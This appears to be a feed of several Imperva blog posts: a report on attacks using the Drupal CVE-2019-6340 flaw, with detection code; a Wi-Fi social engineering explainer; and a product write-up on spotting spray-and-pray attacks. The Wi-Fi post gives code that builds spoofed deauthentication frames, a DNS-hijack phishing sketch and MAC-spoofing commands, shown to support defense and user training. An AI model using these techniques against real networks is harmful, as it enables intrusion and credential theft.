The post Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise. appeared first on Blog.

Latest Drupal RCE Flaw Used by Cryptocurrency Miners and Other Attackers

Another remote code execution vulnerability has been revealed in Drupal, the popular open-source web content management system. One exploit, still working at the time of this writing, has been used in dozens of unsuccessful attacks against our customers, with an unknown number of attacks, some likely successful, against other websites.

Published on February 20th, the new vulnerability (known as CVE-2019-6340 and SA-CORE-2019-003) concerns field types that don't sanitize data from non-form sources when the Drupal 8 core REST module and another web services module, such as JSON:API, are both enabled. This allows arbitrary PHP remote code execution that could lead to compromise of the web server.

An exploit was published a day after the vulnerability was disclosed, and it continues to work even after applying the Drupal team's proposed remediation of disabling all web services modules and banning PUT/PATCH/POST requests to web services resources. Even with that fix in place, an attacker can issue a GET request and still achieve remote code execution, just as with the other HTTP methods. Fortunately, users of Imperva's Web Application Firewall (WAF) were protected.
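To illustrate the shape of the published exploit, here is a minimal, hedged detection sketch in Python. The markers it looks for (the `_format=hal_json` query parameter and a PHP serialized-object pattern in the request body) reflect the publicly described exploit, but the exact matching logic is an illustrative assumption, not Imperva's actual WAF rules.

```python
import re

# A PHP serialized object looks like O:24:"GuzzleHttp\Psr7\FnStream"...;
# the optional backslashes allow for JSON-escaped quotes inside the body.
PHP_OBJECT = re.compile(r'O:\d+:\\?"[\w\\]+\\?"')

def looks_like_cve_2019_6340(method: str, query: str, body: str) -> bool:
    # method is deliberately ignored: the exploit works over GET
    # as well as PUT/PATCH/POST, so filtering on method is unsafe.
    return "_format=hal_json" in query and bool(PHP_OBJECT.search(body))

# Example request body modeled on the public exploit (illustrative only)
sample_body = r'{"link": [{"value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":26:{...}"}]}'
assert looks_like_cve_2019_6340("GET", "_format=hal_json", sample_body)
assert not looks_like_cve_2019_6340("POST", "_format=json", '{"title": "hello"}')
```

Note that matching on the request body is essential here: the malicious payload rides inside an otherwise ordinary-looking REST request.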

Attack Data

Imperva research teams constantly analyze attack traffic from the wild that passes between clients and the websites protected by our services. We've found dozens of attack attempts using this exploit aimed at our customers' websites, including sites in government and the financial services industry.

The attacks originated from several attackers and countries, and all were blocked thanks to generic Imperva policies that had been in place long before the vulnerability was published.

Figure 1 below shows the daily number of CVE 2019-6340 exploits we’ve seen in the last couple of days.

Figure 1: Attacks by date

As always, attacks followed soon after the exploit was published, so staying current with security updates is a must.

According to Imperva research, 2018 saw a year-over-year increase in Drupal vulnerabilities, with names such as DirtyCOW and Drupalgeddon 1, 2 and 3. These were used in mass attacks that targeted hundreds of thousands of websites.

There were a few interesting payloads in the most recent attacks. One payload tries to inject a Javascript cryptocurrency (Monero and Webchain) miner named CoinIMP into an attacked site’s index.php file so that site visitors will run the mining script when they browse the site’s main page, for the attacker’s financial benefit.

The following is CoinIMP's client-side embedded script. The script uses a 64-character key generated by the CoinIMP panel to designate the attacker's site key on CoinIMP.
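As an illustration of how a site owner might hunt for this kind of injection, here is a hedged Python sketch that scans page source for a 64-character site key inside script blocks. The `Client.Anonymous` constructor in the sample input is an assumption about the miner's client API, and real detection would need more context than a hex-string match.

```python
import re

# The one reliable marker described in the attack: a 64-hex-character
# site key passed to the miner's constructor.
SITE_KEY = re.compile(r'\b[0-9a-f]{64}\b', re.IGNORECASE)

def find_miner_keys(page_source):
    """Return candidate 64-hex-char site keys found inside <script> blocks."""
    keys = []
    for script in re.findall(r'<script\b[^>]*>(.*?)</script>', page_source,
                             re.DOTALL | re.IGNORECASE):
        keys.extend(SITE_KEY.findall(script))
    return keys

# Illustrative infected page: the constructor name is an assumption
infected = ('<html><script>var m = new Client.Anonymous("' + "ab" * 32 +
            '");m.start();</script></html>')
clean = "<html><script>console.log('hi');</script></html>"
assert find_miner_keys(infected) == ["ab" * 32]
assert find_miner_keys(clean) == []
```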

The attacker’s payload also tries to install a shell uploader to upload arbitrary files on demand.

Here is the upload shell's content:

Imperva Customers Protected

Customers of Imperva Web Application Firewall (WAF, formerly Incapsula) were protected from this attack due to our RCE detection rules. So although the attack vector is new, its payload is old and has been dealt with in the past.

We also added new dedicated and generic rules to our WAF (both the services formerly known as Incapsula and SecureSphere) to strengthen our security and provide wider coverage to attacks of this sort.

Imperva Makes Major Expansion in Application Security

When Imperva announced in 2018 it would acquire the application security solution provider Prevoty, a company I co-founded with Julien Bellanger, I knew it would be a win-win for our industry. Prevoty’s flagship product, Autonomous Application Protection, is the most mature, market-tested runtime application self-protection (RASP) solution (as proof, Prevoty was just named a Silver Winner in the Cybersecurity Excellence Awards). Together, Imperva and Prevoty are creating a consolidated, comprehensive platform for application and data security.

More importantly, this acquisition is a big win for our customers. The combination of Imperva and Autonomous Application Protection extends customers’ visibility into how applications behave and how users interact with sensitive information. With this expanded view across their business assets, customers will have deeper insights to understand and mitigate security risk at the edge, application, and database.

In parallel with product integrations, our teams of security innovators are coming together. I am delighted to join the Imperva team as CTO and to lead a highly accomplished group to radically transform the way our industry thinks about application and data security. Looking ahead, we will boost data visibility throughout the stack, translate billions of data points into actionable insights, and intelligently automate responses that protect businesses. In fact, we just released two new features that deliver on those goals: Network Activity Protection and Weak Cryptography Protection. Learn more about these in my interview with eWeek.

Network Activity Protection provides organizations with the ability to monitor and prevent unauthorized outbound network communications originating from within their applications, APIs, and microservices — a blind spot for organizations that are undergoing a digital transformation. Organizations now have a clear view into the various endpoints with which their applications communicate.

The new Weak Cryptography Protection feature offers the ability to monitor and protect against the use of specific weak hashing algorithms (including SHA-1, MD5) and cryptographic ciphers (including AES, 3DES/DES, RC4). Applications that leverage Autonomous Application Protection can now monitor and enforce compliant cryptographic practices.

Imperva is leading the world's fight to keep data and applications safe from cyber criminals. Organizations that deploy Imperva will not have to choose between innovation and protecting their customers. The future of application and data security will be smarter and simpler, and we are leading the way there.

Imperva will be at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and learn about the New Imperva from me (I’ll be there Tuesday-Thursday) and other executives! We’ve revamped our suite of security solutions under a new license called FlexProtect that makes it simpler for organizations to deploy our security products and services to deliver the agility they need as they digitally transform their businesses.

Start your day or enjoy an afternoon pick-me-up by grabbing a coffee in our booth Tuesday through Thursday, 10 am - 2 pm, where you can:

  • See a demo of our latest products in the areas of cloud app and data security and data risk analytics
  • Learn more about how our suite of security solutions works in AWS environments

Imperva will also be at the AWS booth (1227 in the South Expo hall). There, you can:

  • Hear how one of our cloud customers, a U.S.-based non-profit with nearly 40 million members, uses AAP to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth
  • See a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm

Finally – we will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” at RSA. It will be first broadcast at 9:30 am on March 6th and feature George McGregor, vice-president of product marketing at Imperva, in a Q&A discussion with executives from several other vendors as they discuss the possibility of a cyber battle between AI systems, which experts predict might be on the horizon in the next three to five years. Register and watch for free!

No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network

Your Wi-Fi routers and access points all have strong WPA2 passwords, unique SSIDs, the latest firmware updates, and even MAC address filtering. Good job, networking and cybersecurity teams! However, is your network truly protected? TL;DR: NO!

In this post, I’ll cover the most common social engineering Wi-Fi association techniques that target your employees and other network users. Some of them are very easy to launch, and if your users aren’t aware of them and don’t know how to avoid them, it’s only a matter of time until your network is breached.

Attackers only need a Unix computer (which can be as inexpensive and low-powered as a $30 Raspberry Pi), a Wi-Fi adapter with monitor mode enabled, and a 3G modem for remote control. They can also buy ready-made stations with all of the necessary tools and user interface, but where’s the fun in that? 

Figure 1: Wi-Fi hacking tools

1. Evil Twin AP

An effortless technique. All attackers need to do is set up an open AP (Access Point) with the same or a similar SSID (name) as the target and wait for someone to connect. Place it in an area where the target AP’s signal is weak, and it’s only a matter of time until some employee connects, especially in a big organization. Alternatively, impatient attackers may use the next technique.

Figure 2: Evil Twin Demonstration

2. Deauthentication / Disassociation Attack

In the current IEEE 802.11 (Wi-Fi protocol) standards, whenever a wireless station wants to leave the network, it sends a deauthentication or disassociation frame to the AP. These two frames are sent unencrypted and are not authenticated by the AP, which means anyone can spoof those packets.
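To make the weakness concrete, the following Python sketch assembles a deauthentication frame purely in memory (nothing is transmitted). It shows that the frame is just 26 unauthenticated bytes: a fixed management header plus a two-byte reason code. The MAC addresses are illustrative.

```python
import struct

def build_deauth(dest_mac: bytes, src_mac: bytes, bssid: bytes,
                 reason: int = 7) -> bytes:
    """Assemble an 802.11 deauthentication frame (illustration only)."""
    frame_control = 0x00C0          # type 0 (management), subtype 12 (deauth)
    duration = 0
    seq_ctrl = 0
    # 24-byte management header: FC, duration, addr1, addr2, addr3, seq
    header = struct.pack('<HH6s6s6sH', frame_control, duration,
                         dest_mac, src_mac, bssid, seq_ctrl)
    # reason 7: class 3 frame received from nonassociated station
    return header + struct.pack('<H', reason)

ap = bytes.fromhex('aabbccddeeff')       # example AP address
client = bytes.fromhex('112233445566')   # example client address
frame = build_deauth(client, ap, ap)
assert len(frame) == 26                  # 24-byte header + 2-byte reason code
assert frame[0] == 0xC0                  # management / deauthentication subtype
```

Nothing in this frame proves it came from the real AP, which is exactly why a single spoofed packet can knock a client off the network.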

This technique makes it very easy to sniff the WPA 4-way handshake needed for a Brute Force attack, since a single deauthentication packet is enough to force a client to reconnect.

Even more importantly, attackers can spoof these messages repeatedly and thus disable the communication between Wi-Fi clients and the target AP, which increases the chance that your users will connect to the attacker’s twin AP. Combining these two techniques works very well, but still depends on the user connecting to the fake AP. The following technique does not.

3. Karma Attack

Whenever a user device’s Wi-Fi is turned on but not connected to a network, it openly broadcasts the SSIDs of previously-associated networks in an attempt to connect to one of them. These small packets, called probe requests, are publicly viewable by anyone in the area.

The information gathered from probe requests can be combined with geo-tagged wireless network databases to map the physical location of these networks.

If one of the probe requests contains an open Wi-Fi network’s SSID, then standing up a fake AP with that SSID will cause the user’s laptop, phone, or other device to connect to the attacker’s AP automatically.

Forcing any connected device to send probe requests is very easy, thanks to the previous technique.

Figure 3: Sniffing Probe Requests

4. Known Beacons

The final attack I’ll discuss that can lead your users to connect to an attacker’s fake AP is “Known Beacons.” This technique relies on chance: attackers broadcast dozens of beacon frames with common SSIDs that nearby wireless users have likely connected to in the past (such as AndroidAP, Linksys, or iPhone). Again, your users’ devices will automatically authenticate and connect thanks to the “Auto-Connect” feature.

An attacker has connected with your user, now what?

Once attackers have access to your user, there’s a variety of things they can do: sniff the victim’s traffic, steal login credentials, inject packets, scan ports, exploit the user’s device, and more. Most importantly, the attacker can also obtain the target AP’s password through a victim-customized web phishing attack.

Since the victim is using the black hat hacker’s machine as a router, there are many ways to make the phishing page look convincing. One of them is a captive portal. For example, by hijacking DNS, the attacker can forward all web requests to a local web server, so that the phishing page appears no matter what address the victim tries to visit. Even worse, most operating systems will identify the page as a legitimate captive portal and open it automatically!
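The DNS-hijacking step reduces to a few lines. This hedged Python sketch shows the core idea only: the rogue AP's resolver answers every query with the attacker's own web server, so any page the victim requests becomes the phishing page. The IP address and hostnames are arbitrary examples.

```python
# Arbitrary example address of the attacker's local web server
ATTACKER_IP = "10.0.0.1"

def hijacked_resolve(hostname: str) -> str:
    # A legitimate resolver would look up the real record;
    # the rogue AP's resolver ignores the question entirely.
    return ATTACKER_IP

assert hijacked_resolve("bank.example.com") == "10.0.0.1"
# OS captive-portal connectivity checks hit the same page,
# which is why the phishing portal opens automatically.
assert hijacked_resolve("connectivity-check.example.org") == "10.0.0.1"
```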

Figure 4: Captive Portal Attack

5. Bypassing MAC Address Filtering

As mentioned, your networks may use MAC Filtering, which means only predefined devices can connect to your network and having the password is not enough. How much does that help?

MAC addresses are hard-coded into network cards and, at the hardware level, never change. However, attackers can override the MAC address at the operating-system level and pretend to be one of the allowed devices.
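The following hedged Python sketch shows how little is involved: the spoofed address is just six bytes handed to the driver. Here it generates a random locally-administered MAC, the approach used by randomization tools; an attacker bypassing MAC filtering would instead supply the captured address of an allowed device. The Linux commands in the trailing comment are the usual way to apply such an address.

```python
import random

def random_local_mac() -> str:
    """Generate a random unicast, locally-administered MAC address."""
    # Set the locally-administered bit (0x02) and clear the
    # multicast bit (0x01) in the first octet.
    first = (random.randrange(256) | 0x02) & 0xFE
    rest = [random.randrange(256) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first] + rest)

mac = random_local_mac()
assert int(mac.split(":")[0], 16) & 0x02 == 0x02   # locally administered
assert int(mac.split(":")[0], 16) & 0x01 == 0      # unicast

# Applying a spoofed address on Linux typically looks like:
#   ip link set dev wlan0 down
#   ip link set dev wlan0 address 02:xx:xx:xx:xx:xx
#   ip link set dev wlan0 up
```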

Attackers can easily get the MAC address of one of your network’s allowed devices, since every packet sent to and from your employee’s device includes its MAC address unencrypted. Of course, attackers have to force your employee’s device to disconnect (using deauthentication packets) before connecting to your network using the hacked MAC address.

How Can You Mitigate?

Detecting an Evil AP in your area can be done easily by scanning and comparing configurations of nearby access points. However, as with any social engineering attack, the best way to mitigate is by training your users, which is a critical element of security.

Make sure your network users understand the risk of connecting to open access points and are well aware of the techniques mentioned. Running simulations of the above attacks is also recommended.

Finally, while specific techniques will come and go, social engineering will always remain a popular strategy for attackers. So make sure you and your users remain aware!

How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications

Attacks on applications can be divided into two types: targeted attacks and “spray and pray” attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization’s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or sold on the dark web. Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack.

One famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability (CVE-2018-7600) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became widely available, which caused the number of attacks on Drupal sites to explode.

The ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.

Identifying Spray and Pray Attacks in Attack Analytics

Attack Analytics, launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.

We recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below.

Figure 1: Attack Analytics Dashboard

Clicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting you is to log in to the console and use the “How common” filter.

Figure 2: Attack Analytics Many Customers Filter


A closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).

Figure 3: Attack Analytics Incident Insights

How Our Algorithm Works

The algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When similar incidents hit a large number of customers within a short time window, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:

  • The attack source: Network source (IP/Subnet), Geographic location
  • The attack target: URL, Host, Parameters
  • The attack time: Duration, Frequency
  • The attack type: Triggered rule
  • The attack tool: Tool name, type & parameters

In some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. In a distributed attack, however, the origin is not relevant, and the other factors carry the weight. In many cases, a spray and pray attack will be aimed at the same group of URLs.

Another significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.
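The grouping idea can be sketched in a few lines of Python. This is an illustrative toy, not Imperva's actual algorithm: incidents that share a source, target URL, triggered rule, and coarse time bucket across a minimum number of distinct customers are flagged as one likely campaign. All field names and thresholds are assumptions.

```python
from collections import defaultdict

def group_incidents(incidents, window_hours=24, min_customers=3):
    """Group cross-customer incidents by shared attack attributes."""
    buckets = defaultdict(list)
    for inc in incidents:
        key = (inc["source_ip"], inc["url"], inc["rule"],
               inc["hour"] // window_hours)        # coarse time bucket
        buckets[key].append(inc)
    # Keep only groups that span enough distinct customers
    return [group for group in buckets.values()
            if len({inc["customer"] for inc in group}) >= min_customers]

# Three customers hit by one source within a day, plus one unrelated incident
incidents = [
    {"customer": c, "source_ip": "203.0.113.7", "url": "/user/login",
     "rule": "RCE", "hour": h}
    for c, h in [("a", 1), ("b", 2), ("c", 3)]
] + [{"customer": "d", "source_ip": "198.51.100.9", "url": "/admin",
      "rule": "SQLi", "hour": 5}]

campaigns = group_incidents(incidents)
assert len(campaigns) == 1        # only the shared-source cluster qualifies
assert len(campaigns[0]) == 3
```

A production version would score partial similarity across these factors rather than require exact key matches, which is where the domain knowledge described above comes in.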

Results and Findings

The Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties its incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with a single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) was attacked.

Figure 4: Spray & Pray Incidents Spread

Here’s an interesting example: a spray and pray attack from a single IP that hit 1,368 customers over the same three consecutive days with the same vulnerability scanner, LTX71. We’ve also seen Bad Bots illegally accessing resources, attacking from the same subnet in Illinois using a Trustwave vulnerability scanner. These bots performed a URL scan on our customers’ resources, an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers using cURL. And the list goes on.

Focusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers.

Figure 5: Single Source Spray & Pray Accounts Affected

More Actionable Insights Coming

Identifying spray and pray attacks is a great example of using the intelligence from Imperva’s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future.
